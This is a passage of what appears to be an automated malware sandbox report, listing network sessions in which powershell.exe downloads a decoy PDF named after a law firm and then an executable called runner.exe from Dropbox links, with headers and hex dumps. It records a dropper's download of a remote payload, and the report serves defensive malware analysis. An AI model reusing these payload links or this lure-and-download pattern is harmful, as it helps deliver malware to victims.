                                                                                                                                                                                                                                                                                  Set-Cookie: t=HIfBQUDf6sB12VAZnIxGwcyJ; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:38 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=HIfBQUDf6sB12VAZnIxGwcyJ; Path=/; Expires=Wed, 10 Dec 2025 17:41:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=Fl8cbmpbZ8; Path=/; Expires=Wed, 10 Dec 2025 17:41:38 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:38 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 8971fe0150e241d4a6b3c7a517adf9c9
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  12192.168.2.449762162.159.61.34437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  13192.168.2.449764172.64.41.34437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  14192.168.2.449765172.64.41.34437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  15192.168.2.449776162.125.69.154438592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:40 UTC370OUTGET /cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:41 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733684767914485d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 143
                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:40 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 106848
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: cce64588c89b4f498890faea0dfd3bfe
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:41 UTC15623INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                  Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:41 UTC16384INData Raw: 6f b3 05 3c fc 9b b7 28 fc 39 03 da b8 cf 07 d8 da eb fe 02 d3 6f 21 b6 84 6a 9a 74 98 8e 55 01 58 bc 6d 90 09 f4 65 c0 39 f5 ae a6 c3 52 46 f1 be a9 a6 8d bc 5b c3 31 1b b9 dd c8 3c 67 d3 6f 6a d6 12 bd 9b ea 79 98 8a 5e cd ca 9c 2f ee dd 3f 93 df f1 3c f7 e3 3e 96 23 d4 2c 35 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a
                                                                                                                                                                                                                                                                                  Data Ascii: o<(9o!jtUXme9RF[1<gojy^/?<>#,5E2`f0T~U|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:41 UTC761INData Raw: cd 31 4a 9c ec 77 4a 46 46 6a 42 cc 0a e5 e7 a9 2b 28 81 25 6c b0 f6 df ea 58 7a 55 9a db 7d 7a fe d9 d3 91 10 f4 c5 e1 ac a7 44 0e 97 9b ad 9a df f7 a5 f4 6a eb a3 14 e7 d5 f7 93 51 18 91 f1 42 81 8c 81 18 74 41 0c 1c 17 06 84 7b 47 a5 f0 d1 c3 dc 63 92 c6 f4 36 16 a5 14 e6 e6 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f
                                                                                                                                                                                                                                                                                  Data Ascii: 1JwJFFjB+(%lXzU}zDjQBtA{Gc6gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu|n:27wUW:Jj+bo
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:41 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                  Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:42 UTC16157INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                  Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:42 UTC16384INData Raw: ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5 10 3a 6e 8b 76 49 5f b8 dc 10 46 aa 1e 21 7e 2f ea ad ae 00 c3 f5 8d 8c 89 2b ef de 98 17 aa 63 ab 57 85 6b 77 d5 58 c1 e7 b6 08 a4 4f 1e 98 39 36 b1 eb b5 93 6b a7 4e bc be 7f 62 77 98 e5 ed 94 56 43 d3 56 8d 80 3f ee 48 a4 52 2e 2e c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e
                                                                                                                                                                                                                                                                                  Data Ascii: 6R#90iq0l/}VA\N'Ff|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A:nvI_F!~/+cWkwXO96kNbwVCV?HR..=kDc)Vc
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:42 UTC16384INData Raw: 0a 38 33 20 30 20 6f 62 6a 0d 0a 5b 20 32 32 36 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 34 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 31 39 32 37 32 2f 4c 65 6e 67 74 68 31 20 38 33 31 36 34 3e 3e 0d 0a 73 74 72 65 61 6d 0d 0a 78 9c ec 7d 07 5c 94 57 ba fe 39 df 37 8d 29 cc 0c 32 b4 01 66 c6 01 44 47 c0 82 0a 6a 64 94 62 ef 8e 01 6c 20 a0 68 50 51 b1 c4 a8 21 31 d1 84 68 7a af a6 9a 8d 29 c3 68 22 9a 66 b2 a6 6c 8a e9 65 93 4d 71 37 9b 4d 36 31 6d 37 cd 28 dc e7 7c ef 1c db 6e f2 df dd bb 77 73 73 ff f3 c2 33 cf 73 de 53 be 53 df ef f0 13 7e 32 ce 18 73 e0 43 c7 6a ca 47 94 4d 2b e8 65 bf 8b 71 ef 77 8c f1 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c
                                                                                                                                                                                                                                                                                  Data Ascii: 83 0 obj[ 226] endobj84 0 obj<</Filter/FlateDecode/Length 19272/Length1 83164>>streamx}\W97)2fDGjdbl hPQ!1hz)h"fleMq7M61m7(|nwss3sSS~2sCjGM+eqw'G+x)}&N-wcu#<
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:42 UTC227INData Raw: ac eb b9 2b fb 66 4c 12 0e 6b 36 28 7c 8d e5 c0 3b 3f 1c be d1 74 de ac bc 43 e2 62 17 39 59 ec 42 c3 e6 9f 84 b0 fd 9b d3 f5 27 b7 fa 26 27 88 92 a2 f5 28 ed b0 81 6c c5 17 db 9a 1e 51 40 92 ea 9a 8d d8 9e 34 ed 75 21 fd ab 07 0a c4 9e 02 c2 c3 c7 71 7d 66 d0 16 72 7a 70 e0 86 79 7d e8 d1 e5 95 ef 0a 37 7e cb cf 1b 3a c1 a3 61 d1 37 43 96 90 e1 26 c3 6d c5 6d c8 a0 92 ba 85 4e 1f 3e f2 5e dc b0 d0 dd f0 4b bb fc 0f e6 74 ad 15 48 50 cc e5 ac 75 79 34 e4 ae 1b ff cd e1 b0 53 45 4b ea ec 7e b7 f3 d9 92 19 d3 53 97 46 cf eb b7 ef d1 90 c8 11 a2 ce 8b ee 39 e5 df 38 b9 21 55 16 3a f4 e1 a0 e3 01 61 03 2f 77 79 ca 8b b7 f3 7a 67 19 df c0 c2 b7 ac d1 80 41 4f 77 e4 f5 cc 10 47
                                                                                                                                                                                                                                                                                  Data Ascii: +fLk6(|;?tCb9YB'&'(lQ@4u!q}frzpy}7~:a7C&mmN>^KtHPuy4SEK~SF98!U:a/wyzgAOwG
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:42 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                  Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  16192.168.2.449790162.125.69.184438592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:44 UTC212OUTGET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:45 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instr [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=ODY0MTA5ODg4MDQ5MTg3NzUxMTAxMzE3Nzg2MDk4MzA4MjY2NDg=; Path=/; Expires=Sun, 09 Dec 2029 17:41:44 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=LoG4-5UaCOwwYiB0kzXdYtNJ; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:44 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=LoG4-5UaCOwwYiB0kzXdYtNJ; Path=/; Expires=Wed, 10 Dec 2025 17:41:44 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=ovA5BE4ymE; Path=/; Expires=Wed, 10 Dec 2025 17:41:44 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:44 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:45 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: ea52e1fcbed0456f86255207ce65c823
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:45 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  17192.168.2.449795162.125.69.154438592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:47 UTC370OUTGET /cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733821048842868d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 211
